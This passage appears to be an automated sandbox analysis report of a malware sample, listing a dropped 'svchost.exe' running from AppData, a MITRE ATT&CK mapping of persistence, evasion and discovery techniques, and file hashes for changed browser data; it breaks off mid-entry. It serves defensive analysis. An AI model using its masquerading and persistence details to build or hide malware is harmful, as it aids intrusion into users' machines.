C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5816

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2320

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004E4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2128

C:\Windows\System32\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:6008

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5460

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3516

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
01345daa7bb1d02a2f89d1b452aa9a49

SHA1
7eb309cf81a11be70d7c85f44abda20d4063566a

SHA256
f093c2ed82c9c88935c6afa074913bee8db1b6d876f4d029490e6565bec969b5

SHA512
4242acbd5964c52471fcf4b848cd9e7d2f642847f8a76f7fbb6bbff09f11406031dba0ff34d1698b58803f7edb5a04559e0718c160f18e9352c69435f01bb7f0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
74c3f37f825fb938aeb86b5aa5c64408

SHA1
6486778642e85ffca6bd156a35aad494524e46d0

SHA256
7864004e5185d6ed86fd5f601c0b63c898fe210c46c6d1614844dd3c4fbbea79

SHA512
10dfa321e1aaad1d8da8633480eceb6bc4a6876efe7b3b64d4a95a913a3f574e4fb7b9a22b3741da76689130f7824b8e597d701c880a6ab59511b28455ddfbbb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
4fe8e6ee2f6df613bea2c143822ccf46

SHA1
c221d0822c99e1d9922a21a87d0074cc8065b619

SHA256
80737cc47e4e718a430a8f84dd935dc1009ca633ce35a548145c0312e3904c9c

SHA512
22910ed3147ece120aba2b2bdb3cfc3046d87b142953d86370f9e3d39870b4e39b380f909a613c51c98833349ec4067fe7fe000514ec703e69e15f23cc870add

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
64fa8c0a1d4eaefe403dd25e89393590

SHA1
62068c5fdedaaa97e33d101e4c14fe70a89aa8d6

SHA256
7461857f9ceab35016afbea884284e065c8cf41df0917fa0c53dd1a607aded17

SHA512
5e35658a1925aa71093153123d054a8e707b7627f7851d43aa05badcd0f490f0c8814321645a2b65b5289f70db5e494731add408563c8ac2b28e58a1ca9caa56

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9f784ab877fd7d107f01bf46f36e5ff2

SHA1
76f6122637642efff0bcf2729e0df2470824b94e

SHA256
d205d2f1c9eb862d204f66fda4a60eb463b1b9b178abd67d093b643e13900d61

SHA512
66b98870998bc15ab0de290157e3225267db1dcc81bac55f264c17b8f83f228158cd27dc2b1c3e9f10d6cea5a1a677f7e4af1180ef59d3306baf8a99308af5f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
cd0675aaedd97c865b29cbc54f00491c

SHA1
5d68e55d509fd185408196f5aeea595185e04c0e

SHA256
da50bf7549aa4523c42f0f768323c864c5851eab2722903b51baabc2dcab0b0e

SHA512
d6059873a22c750de66b7c75eb353b9119f81d691f05630bcad6d408bacd1e5102658fdd1b147aad4cee5fa5ab23434377d76b691a43b6b73b9bb9bf590641bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
ef4721cf9c0f64da9eb125ed48ebcc49

SHA1
1cbbe5c77c6e153f4e05194c2584d4410e1a1fbd

SHA256
ae714873bb31d7fa66f86312a868d30f0beb60bd8250b12834f860e770a45cb8

SHA512
3d9deba3d8c65003e16ac72239b4412a8fe033f3f784b1bec244fb902c1856269826c4da876579562bf2bd4834c391f41a53541f3d416d2f73aed1bec13134ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\bfb47aca-a082-4491-8d5f-d981b380df7a.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
233KB

MD5
241302d5ed1c08f8d8cdf0dd4b2440f1

SHA1
3005e63a6c1ba5b085888508849bcb6734572df0

SHA256
0ed9a854315c1a52b62c834183958d6845708b393f8da4e8857770d31343448f

SHA512
3dd9ed2549a03b2fb5f999fc9a3ebc79cad571f9c4ad36f855155d87ea38bdb65ee49767ed94b18f14393b56f96b8da888736484b5344f7f1e7e8e4d743cfb9f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
233KB

MD5
347a8a54deca69750d8b648eacce3e24

SHA1
af7f7c69dd7e544ed11faf18bc9469cb62d30fbe

SHA256
4f216f052c72b0a5544a525ea7c98a8ee19d39e004a3ac88e36180dd12723ffa

SHA512
76b328c0d24414341c03fb6e4295440c2cf2859a34343b8f2a4659956d0e4064d7eb6f0671eef2f1b19f277421b0e61c187a29cfdb3096a7c087e403e19ea00c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Cache\f_00000e

Filesize
243KB

MD5
166067ab4e8e0e4360a5ef617a3d9e36

SHA1
b5412c8099e10e7898e877f4a3e9b03582f08a83

SHA256
0573502902ebd67c929cfd48f869ff80dc91f340442dac9dd4099d136fe01fc9

SHA512
af9590fd696a7ded64245216ca22e8d8f39b990a191eb3402c755ec9233515c449b32c976793f15593d8134c1b7b16133bafc00be7a2e6b5a110a8d54977f69a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Cache\f_000017

Filesize
49KB

MD5
da6e34fae9b3ddef29ffcbbb0912d6fe

SHA1
2a5d74cae10d2a5ec12d5b6dbf042bfbaafd9336

SHA256
5c9383ba24395c1c8b5f9ae51d4290a98e4a6f3910d2c71d91399e7c4c5ae661

SHA512
1eed354367473e403f8ad55e8527b6ffe10646a436abd6b3c81cd1bd17107465bdddfb8a5507ba43904054f03678096780063f254619ac76f5a0c0839867ab4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Cache\f_000018

Filesize
641KB

MD5
fbd295b721ad3d5804bdb2a278eea75b

SHA1
a3a9b097f14b9fdf4174d16c249764fc4a4778d0

SHA256
d6ec901270bc92b63f7e074e112541f2eac59e1e8e2fc05c7e8314281b621f7d

SHA512
73e54ed80d1867d318a5cbb6bd552b5ef58dd4cc8a45233796dbd9f5c44f02040761733b0968ffc6d322727f3f16001b943ae124e097904e1a22d5405ba70421

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Cache\f_000019

Filesize
34KB

MD5
19aae33887c6287c6db80d79cdd34f5a

SHA1
3d453a877bdff0097cf125addc8f5f1b85580362

SHA256
09c5b498a942533c54c94c229aa8129af67b0cdaabeffcf8ee6c03d04552ea52

SHA512
0fac3cf3a46aab179cf054de5544c19ecadd740f87770c5ea92ac665f7ec5646d29ef17ef4d9f4bc7889d8060431319b9fcedd59acb7156bc8c8df3ee99b83e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Cache\f_00001a

Filesize
34KB

MD5
08f9985e49aab1e6c5e9810ef6f8afad

SHA1
c0b6d51c227bbe3e7ae6151536b633c007d4c609

SHA256
ed2477616a2ca75ef014c2dd86b28c1d9a042c8df9bf72c76a61763d430d7f18

SHA512
80cd2c3133e37db5be277b48a1e3b1a319f305e52bff72ccd73775bed04ed64d7fa0a2ae24ac7ef5937257a31bfb7e19c2c95a851a52b2ce398bbafe4f04993d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
314364606af57566e733c7614f0879b9

SHA1
d1099c1c18e45757fe962c0d1e315ec23dfeabe9

SHA256
74211db45fe69d2838860dad2c466bc1a1cbc56b631572a0b6c560e491a42c66

SHA512
25910444d6a5cf6934be807ef8e8d6747b006e3a8d9d696a79615bd5ba6285af7fe3d309ee530c7510b974189808e3d45641f05c0d6e74f63b1fb5b1495290f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Code Cache\js\index-dir\the-real-index~RFe59d7e8.TMP

Filesize
144B

MD5
ca327999358c4423a1865baf3773a768

SHA1
17b4f48e48944b96a5bad1577520de05344ffe87

SHA256
c7f9b3cefb5d8a7f142dcfe25e5020a124641de3a8db385acb0dc81b79847115

SHA512
40966af3063f76c7f22f72484c05d2f6f1f999d9bccf4ca9286e49d62548acf3882ed297b92e5560d4699b47a0cbe828639711472e47a681ae9599753878a321

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Network Persistent State

Filesize
4KB

MD5
4e1f61fa25d6e80f807e5e1f528b3057

SHA1
302002d1f7fbe1f5a195d6113b47a663b67b073e

SHA256
1853b9da8b171f54626c164a4f9222783311d170c2127b59ba346f25250dd940

SHA512
9ab7afff532bbfde7af68f07e946f511c5223b291e9270739c9ea279151106bc36132c19075ec8cfed7852806f1034b0cf5786ff42359282e6904f2f7ced487d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

Filesize
6KB

MD5
a4e41bead1adf61cbdecf00d7342f1ed

SHA1
6b48b426f994cd1210faaed5f2f576edcb8bf4eb

SHA256
02742907e8da8eb63a6d8c3049745bc00c9be1f532413da4179befc09407bd3a

SHA512
d4d352b8f9bbb3df3706b9408e9958edce26e5651cafba48d4f7cb59d53b3c3d774d7e16762deb2b23cd83b952c7e4c6b6ad06e1074d117537308f8dd1cd3b04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

Filesize
6KB

MD5
1613db0bb9b177be11097ee5c3fca541

SHA1
ab265b2f6c5012465fac9c47eab34892a871843a

SHA256
d7f7a74e0f2f048845641ac76c4b80902e5195177d379afd9d457fbc5517de61

SHA512
8d3140f76d58ed9ee5c4f0923c9c0d7afa079608c544b1da10ccbf71b749707b4a365666c86fb83d41f1bd1e4292e7a2e9b576e346e6619542e813421b561b29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

Filesize
6KB

MD5
febabb241f72c338063b49d8e1fb0b61

SHA1
60ab71f2d7b41b745f2185e23815c45e70a7fc64

SHA256
02fa58534dd330ead0c7be54cdfc5bb2325d92cf7dbe085606fe4dadbe8c5baa

SHA512
e84aea87516966b052b27ac51ce428f5afd7012da115969d9a09589d2b2ae2dacaf496bb0e524faf8ec27d5737ef5878966e1d1b22951455e2e93731a60bbe29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

Filesize
7KB

MD5
e4f9e01d7d49552bff9e7e838f5a810b

SHA1
2126179c5b38cd122fb6fff33230b9d4c914b11e

SHA256
523d9104960c5d0a6ca14616d7f58324243590f1f0749b5d119ef577f95f393f

SHA512
94469148abf1a7685c487a456370c69a954d53d84bd44fcd79b60ff15e216b13b5bec821f9d8ed578c90042ddd49cba65cc0bbfc1b1959839f435e96d9aaeefd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\119875e3-475b-4137-a638-b858d9261d95\index-dir\the-real-index

Filesize
624B

MD5
468f5a9a6a87fc6519875bcec711303c

SHA1
ace0347dd51bb6871969eebe485b733fda147a85

SHA256
a4673631b64b632d794bd7fe5db32d42bc5dfa5826328f9d2f562905c4a84f2a

SHA512
a7b15bfa886f92f568be97d08532abd195b583ac84b4a45a45dabbf3ef9967d20556fe7677a24eeb0591143f6d33f034063ba685573ac8c80631e2231118b5f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\119875e3-475b-4137-a638-b858d9261d95\index-dir\the-real-index~RFe599b2d.TMP

Filesize
48B

MD5
2408ca3762175979384670e6091c9222

SHA1
1d756afe3ce5640f6f598d293df99ff8c330a63d

SHA256
80c0c475057aa7762b43b31b15392df452bd375fe7800a255f4ca900fb37d503

SHA512
c87ffddcb860b784bd6162471e5c93fc812fa58dac87012dafec3d5fd432ffbdfd7f1665c0bd69440221f6c75595b29c5c41138b18524c3033face65e16e3ab5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\513f4910-4408-4726-9cf4-d73a38f856ad\index-dir\the-real-index

Filesize
3KB

MD5
4fc2a4f6a4f3e98ef7b9d46962572bc8

SHA1
6d2a1de4f706d2fb1090ac8ef571719e96db0c1e

SHA256
84401565bd1c9f5e09fe9887c6b554d63f56a9be6dcc2ef5ac245d69bcc551bd

SHA512
342c83cbb7a2381c46e4c6dd99c2872c767deff700169fb1c927751a561e862517b0e8743300e1afc0257c2e16d225c929d45679cc9fc1f27f77151e092ad654

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\513f4910-4408-4726-9cf4-d73a38f856ad\index-dir\the-real-index

Filesize
2KB

MD5
d0ccb44047adc327f3e2431d58ac87e7

SHA1
a4d3a12264ef49ee1ad34ecd26cad1593bb421aa

SHA256
f774416ff5daa211521e54664bb4e0f9f4671cfb11c3dad89cad5b599e01fd50

SHA512
b2eeac7c6c48019b2f047458cbad19d65a16d3edf97a1210f4c0f37880ec408c20f8e9eb6107fecd98184b490d1a10b4135d436762bc6021cc9a0f6ede45c069

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\513f4910-4408-4726-9cf4-d73a38f856ad\index-dir\the-real-index~RFe593c82.TMP

Filesize
48B

MD5
080103818914104b2c221f9e1dd6e6d3

SHA1
a2234823d69d4afb2d768174be46451c52844b0b

SHA256
7391fe86b6c4c70b739f213e57f68d25754b78344b2b4ae385e7a79b9a39c995

SHA512
a926614fd6dad18a1b27f19feedcff9478f6047eaa0448ada90de022782f9df7ce7f0c8a22e21b12cd28eb797dc4f17e739991f6eee8840c91d6d8916c7fa18b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
157B

MD5
12d33c53db66432f0160278befa8776e

SHA1
c18e16f1529b819bfbb751827165490affd8b4ef

SHA256
b93add6abb10a7834d6c94cf1517563270fc4f22c719d882d146aa8d70610a5f

SHA512
78412fe22e9e920c6d5081ea865091c46d11a3d057e157bb4b4cd83f5d11367bd123bc71fb885808129247b5061ab838ee0ffa275676b97e831eb1baee1a5379

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
84B

MD5
7a3d860516378167ec6f77942cc93027

SHA1
9a3aca2189f2816328207c6714d38b1a33ca2062

SHA256
c81a215f39686828aad0882ce7e609cbb4ce5897121c24946db2d71c1b84e07f

SHA512
ea31aa693a2ae59c45aec1ea48a8f472275e279c740a6f8df88b3fdd6612634763d211046e4fef1731c2a02329ff55e418e57ef746821337bbaabe9c62c8bb6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
153B

MD5
8d7ddf3e14ad35c4e7c81dc7947058ea

SHA1
4701ffab69092049449f67c5343ca4d11636bfb6

SHA256
47d3ff4ca4ff3bb03e34fd58099ad8762e4ed8531797919dcb79aae9db6d9678

SHA512
a9cdca3f48d1d7b32778a09f0b28f2ee48458989179431ad171be0f4e647b14080270ec9e44758246f204ce39aaafe3fca76d5d02f15c4df60e85f595612eb3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
148B

MD5
641f0a4bfab3a5f7f5e98bab3e3a86c1

SHA1
143ddc42ac0ba482aa88ac463187c98f0f3601c7

SHA256
939c93b4e25d421be00e5959afabe2066aeab4847ad543164149ffe381e91f6c

SHA512
270f29a56dc0107c52e3ff5a45b4f6a93be622e07b1a8f19b2971c0561da6e83106f395590aa3473f510e09df4d28e81dec5c648c2ac8a22eda5e52a95f7837d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
08846cf763b538eb800735570fddff94

SHA1
6fb7c8169cb0a6282b752d0a8e718b961975c483

SHA256
36e03abbcd71b62412d3f3dfa4cd6723becb8bf44f34f4c43e45a7e90eb708cb

SHA512
a35259cfd858272e5181cb7b2f463df90d8be10bf449be7ae43e2708436d65a87d160ed4b7fb95317d1ac003113312416786e0f579247c049b95aefe318c8ba2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
62603fc5237367f243e14671d1995ec8

SHA1
f90b672de6832ac8722cdada46eab8a4c6b0ba06

SHA256
6b94556b5f479a57c7764fae0976cd323f2d335cc86c7268cb29bdf269183d21

SHA512
b000d5d4fecab650e43ee7781e3dfab604bf2895b96864622c20a785a601c13adbef560ece9f2b6a3e5be304debb81f368d805e5b2fd54b20cefd1258aa6b4ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
1399006709dfa6352c50bcd1d817dfc9

SHA1
dff8c5e4154615c1bafccaf0589cf75e1f5a3fa9

SHA256
5a53470ceb38a989d43ffeaad471f383a5fa9d63feb6f971d0409b56e2e62bf7

SHA512
210aa90abfe9d6078573f9787a74fe727b50b689ef79d4ff64b95010fa94b21688d992969ce0b0cc4299ef7c34715cd64fc025246aec74936a3d560644f99c2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\ScriptCache\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
9d7b724a99ef5fd0c79c4d4838849d18

SHA1
f884d8c07b5ec00036f790908d4e01119f1081f2

SHA256
dafc6dda838ba9e0aa80ac3950077c79d0adf96af342eec1be1818066d657473

SHA512
c48148dcd55f1fd7a40d70c5236526952957c12d54c7dbac55a46e201d4a9771de90e308457d7253c13ddd72a757c9ae168e5e8dbad8b8150ceb628774b8660a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5990ad.TMP

Filesize
48B

MD5
660919905023d58354b2c6f139f9e355

SHA1
6ab6a7b8a80650b55e1cb65cfe76ad21bfe9dbf7

SHA256
332a908ead57ee76d7349eb87e3dccf75b43d177600e016528ba02d5d20e7e4e

SHA512
92a1ff1aaec9969dd4408a051d405d8e4f8df0074bdca69b1b41a47691ed0c74dd8d043016ba99c45f1f530b5b760530be25b10d8288cf44595213f5d5bb41af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Session Storage\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\TransportSecurity

Filesize
1KB

MD5
a43c9615dff73ed6173d4c46f2532c54

SHA1
b83bf99a276834bfe58a12b058bfa66200c2ce75

SHA256
00d01b9ad95022d1cb6f2d31aba3192201e8c3606b02757e89609a4baf726c7c

SHA512
c15a334dfd990013fb3101a077793fba74528b247c2eb10ba2b9edce99d4605fbfe7ce634ebfe8baff7171457edfaa3ceb1c8646ec4a0b0eafb5796b69411cd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\TransportSecurity

Filesize
1KB

MD5
f49bd2d3f8cf4c6329c41ee1108b05cc

SHA1
2e3be433c47be483edd0341ab74b0ee1a7097527

SHA256
822522f01ef4eac22a7997707f7548887352cce3a8225cc55576a4b38116d16e

SHA512
ae6cc9c0dff84944bbd9a724a793d3fca9e3431a9535c7f59184d940cc8eaf57ec9cfb357565825b0d5b4df72aa82cf7f23c9c79d3b8c559ae437c6487f7d18f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\GrShaderCache\GPUCache\f_000002

Filesize
20KB

MD5
7e86d5c1bf2ff36b15bfbd8fcf748b16

SHA1
59a1515ddff8caec85c4f27ffb17b69a42ec6226

SHA256
82f03e141e82546b261c1a24cd9ae3cfd4b19a7b4f343a296428deeda88cf856

SHA512
943fdf966d2ca4bfb35e01431e7bae1611e86d4bbf9c27524ba4502a9a93b8c0bb39e7760a8ee76993c4099da1ff49febe0b48468f134d4121f22a0ffb41bf2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
003b92b33b2eb97e6c1a0929121829b8

SHA1
6f18e96c7a2e07fb5a80acb3c9916748fd48827a

SHA256
8001f251d5932a62bfe17b0ba3686ce255ecf9adb95a06ecb954faa096be3e54

SHA512
18005c6c07475e6dd1ec310fe511353381cf0f15d086cf20dc6ed8825c872944185c767f80306e56fec9380804933aa37a8f12c720398b4b3b42cb216b41cf77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
051a939f60dced99602add88b5b71f58

SHA1
a71acd61be911ff6ff7e5a9e5965597c8c7c0765

SHA256
2cff121889a0a77f49cdc4564bdd1320cf588c9dcd36012dbc3669cf73015d10

SHA512
a9c72ed43b895089a9e036aba6da96213fedd2f05f0a69ae8d1fa07851ac8263e58af86c7103ce4b4f9cfe92f9c9d0a46085c066a54ce825ef53505fdb988d1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
b60a6ed9138d4746bb26d101ce86ef61

SHA1
c015c0b23c2d0738842d0428f04d9b006ff6e836

SHA256
34a439dbcf36abd9c3ba3dfa6f2ee48731ecbcaf2621e800554dcb6d85d4cbda

SHA512
ffa4a23eacb43cebe2316c8db4f294224748e32494103ceae3f81ad86c9b2bd694f9649b1dcd0a0dc32195d8c2268ce800cdd9d5ff95d14ce85db35aa0271b52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
6af0509f89dc2cb7fd94228fa0c88c65

SHA1
